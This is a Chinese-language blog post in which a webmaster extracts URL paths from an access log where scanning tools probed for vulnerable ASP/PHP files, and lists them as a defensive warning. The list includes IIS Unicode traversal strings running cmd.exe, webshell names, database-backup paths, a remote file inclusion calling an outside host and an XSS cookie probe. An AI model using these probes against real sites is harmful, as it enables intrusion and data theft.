这是我整理出去的日志中,一些小毛孩企图用工具扫出漏洞。我用的脚本是: grep -r “InetURL” ./www-access_log|awk ‘{print $7}’|sort|uniq 出来的结果: /admin.asp /admin/Databackup/NewCloud_Backup.MDB /admin/diy.asp /admin/helps.asp /admin/myup.asp /admin/nsclass.asp /admin/save_upfile.asp /admin/SouthidcEditor/PopUp.asp /admin/upfile_flash.asp /admin/upfile-flash.asp /admin_user.asp /admin/webeditor/admin_login.asp /admin/z9v8login.asp /admin/z9v8myup.asp /admin/z9v8upfile_flash.asp /admin/z9v8uploadPic.asp /alexa.rar /alexa/z9v8fadmy.asa /archives/415.html /archives/date/2007/07/01 /bbs/boke/data/dvboke.asp /bbs/data/%23cnhww.mdb /bbs/Databackup/dvbbs7_Backup.mdb /bbs/database/BBSXP2007.mdb /bbs/database/bbsxp.mdb /bbs/data/dvbbs6.mdb /bbs/data/dvbbs7.mdb /bbs/data/dvbbs8.mdb /bbs/data/z9v8shop.asp /bbs/diy.asp /bbs/hy2005.asp /bbs/hy2006.asp /bbs/upfile.asp /bbs/webshell.asp /bbs/z9v8cmd.asp /bbs/z9v8css.asp /bbs/z9v8digshell0.asp /bbs/z9v8digshell1.asp /bbs/z9v8digshell2.asp /bbs/z9v8diy.asp /bbs/z9v8key.asp /bbs/z9v8myup.asp /bbs/z9v8servu.asp /bbs/z9v8servu.aspx /bbs/z9v8servu.php /bbs/z9v8update.asp /bbs/z9v8upfile.asp /blogdata/L-BLOG.mdb /boke/data/dvboke.asp /cgi-bin/z9v8..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir /cgi-bin/z9v8..%e0%80%af../..%e0%80%af../..%e0%80%af../winnt/system32/cmd.exe?/c+dir /data /data.asp /Databackup/dvbbs7_Backup.mdb /Database /database/%23database.mdb /database/%23newasp.mdb /database/BBSXP2007.mdb /database/bbsxp.mdb /database/#newasp.mdb /database/PowerEasy5.mdb /Databases/0791idc.mdb /databases/21asp.mdb /databases/asp99cms.mdb /database/z9v8 /data/buk/cnmai.mdb /data/data.mdb /data/dvbbs6.mdb /data/dvbbs7.mdb /Data/Dvbbs7.mdb /data/dvbbs8.mdb /Data/dvbbs8.mdb /Data/Dvbbs8.mdb /data/Joekoe_CMS_4.0.mdb /Data/LeadBBS.mdb /Data/MeskyDMS_Data.mdb /data/scadata.mdb /db /db/com02.mdb /db/play.asp /diy.asp /eWebEditor/admin_login.asp /ewebeditor/db/ewebeditor.mdb /eWebEditor/z9v8admin_login.asp /fdnews.asp /flash/downfile.asp?url=jackie/../../conn.asp /flash/downfile.asp?url=uploadfile/../../conn.asp /FooSun_Data/FooSun_Data.mdb /Foosun_Data/FS400.mdb /HYTop.mdb /images/z9v8yesitis.asp /inc/z9v8conn.asp /isee.asp /jhset.asp /link/z9v8addlink.asp /link/z9v8link_add.asp /manage/login.asp /manage/Login.asp /Manage/login.asp /manager/webeditor/admin_login.asp /manage/webeditor/admin_login.asp /manage/z9v8login.asp /mdb/etwldbs.mdb /mh20 /mhxy/data.asp /mima.txt /mirserver.rar /Mirserver.rar /mtv/z9v8upfile.asp /music/z9v8upfile.asp /newcomment.asp /nopass.asp /packet.mdb /pass.txt /password.txt /php/bak/z9v8dede_admin.txt /phpmyadmin /qq.test /qq.txt /Reg/z9v8User_Reg1.asp /Reg/z9v8User_Reg.asp /rxjh.asp /s8log.txt /s8qq.txt /samples/z9v8..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir /samples/z9v8..%e0%80%af../..%e0%80%af../..%e0%80%af../winnt/system32/cmd.exe?/c+dir /scripts/z9v8..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir /scripts/z9v8..%e0%80%af../..%e0%80%af../..%e0%80%af../winnt/system32/cmd.exe?/c+dir /shop/upfile_flash.asp /showpic.php /sql.rar /support/z9v8advertise.asp /uerlist.asp /upfile.asp /upfile_flash.asp /upfile_other.asp /upfile_Other.asp /upfile_soft.asp /upfile_suftpic.asp /upload.asp /user/my_picture_upload.asp /User/Reg_service.asp /users/Editer/z9v8SelectPic.asp /user_upfile.asp /User/User_Space.asp /vod/z9v8upfile.asp /vti_bin/z9v8..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir /vti_bin/z9v8..%e0%80%af../..%e0%80%af../..%e0%80%af../winnt/system32/cmd.exe?/c+dir /vti_cnf/z9v8..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir /vti_cnf/z9v8..%e0%80%af../..%e0%80%af../..%e0%80%af../winnt/system32/cmd.exe?/c+dir /_vti_pvt/z9v8authors.pwd /webeditor/admin_login.asp /web.rar /web.zip /wolserver.rar /www.rar /wwwroot.rar /wwwroot.zip /www.zip /z9v8新建%20文本文档.txt /z9v8123.txt /z9v85uwl_login.asp /z9v8aaa.asp /z9v8admin.asp /z9v8admin/editor/db/ewebeditor.mdb /z9v8AdminMain.asp /z9v8alert.txt /z9v8ASPAdmin_A.asp /z9v8ASPAdmin.asp /z9v8asp.asp /z9v8aspcheck.asp /z9v8cmd.asp /z9v8conn.asp /z9v8conn.asp.bak /z9v8css.asp /z9v8digshell0.asp /z9v8digshell1.asp /z9v8digshell2.asp /z9v8diy.asp /z9v8dv_dpo.asp /z9v8editor/db/ewebeditor.mdb /z9v8Editor/db/ewebeditor.mdb /z9v8flash/downfile.asp?url=jackie/../../conn.asp /z9v8ftp.txt /z9v8html/editor/db/ewebeditor.mdb /z9v8index.asp /z9v8index.html /z9v8key.asp /z9v8log.asp /z9v8login.asp /z9v8log.txt /z9v8manage/login.asp /z9v8menghuan.txt /z9v8mima.txt /z9v8msmir/5uwl_login.asp /z9v8msmirdata/msmirArticle.mdb /z9v8msmir/editor/admin_login.asp /z9v8msmir/editor/db/ewebeditor.mdb /z9v8msmir/msmir.mdb /z9v8msmir_net.mdb /z9v8myup.asp /z9v8NewComment.asp /z9v8passport_client.php /z9v8qq.asp /z9v8qq.txt /z9v8.rar /z9v8Region.asp /z9v8register/userreg_step2.asp /z9v8ScanWebshell.asp /z9v8servu.asp /z9v8servu.aspx /z9v8servu.php /z9v8servusu.asp /z9v8setup.asp /z9v8shell.asp /z9v8shop/npsout_reply.php?INC_SYSHOMEDIR=http://ma.vvind.com/uploads/php.txt? /z9v8show.asp /z9v8shell.asp /z9v8shop/npsout_reply.php?INC_SYSHOMEDIR=http://ma.vvind.com/uploads/php.txt? /z9v8show.asp/z9v8showerr.asp?BoardID=0&ErrCodes=54&action=JavaScript:alert(document.cookie); /z9v8sitemap.xml /z9v8su.asp /z9v8tmdqq.asp /z9v8Trace.axd /z9v8up_BookPicPro.asp /z9v8update.asp /z9v8upfile_adpic.asp /z9v8upfile_article.asp /z9v8upfile.asp /z9v8upfile_flash.asp /z9v8upfile.htm /z9v8upfile_photo.asp /z9v8upfile_soft.asp /z9v8upload.asp /z9v8upload_Dialog.asp /z9v8upload_flash.asp /z9v8web_scanner_test_file.txt /z9v8wish.php /z9v8xiao.asp /z9v8z_shop_newshop.asp /z9v8zz.asp 这里主要是mdb库或asp文件,包含php的也有一些: /bbs/z9v8servu.php /php/bak/z9v8dede_admin.txt /phpmyadmin /showpic.php /z9v8passport_client.php /z9v8servu.php /z9v8shop/npsout_reply.php?INC_SYSHOMEDIR=http://ma.vvind.com/uploads/php.txt? /z9v8wish.php 这些就是可能有漏洞的程序,站长们可以检查一下是否存在这些目录/文件。 另外,我只是grep了一下标识头为”InetURL”的请求。这个可能是一些黑客类工具发送的,这些工具应该是用了Borland 的工具包 或者是VB/VC的控件来开发的。 我会继续关注一下其他的扫描。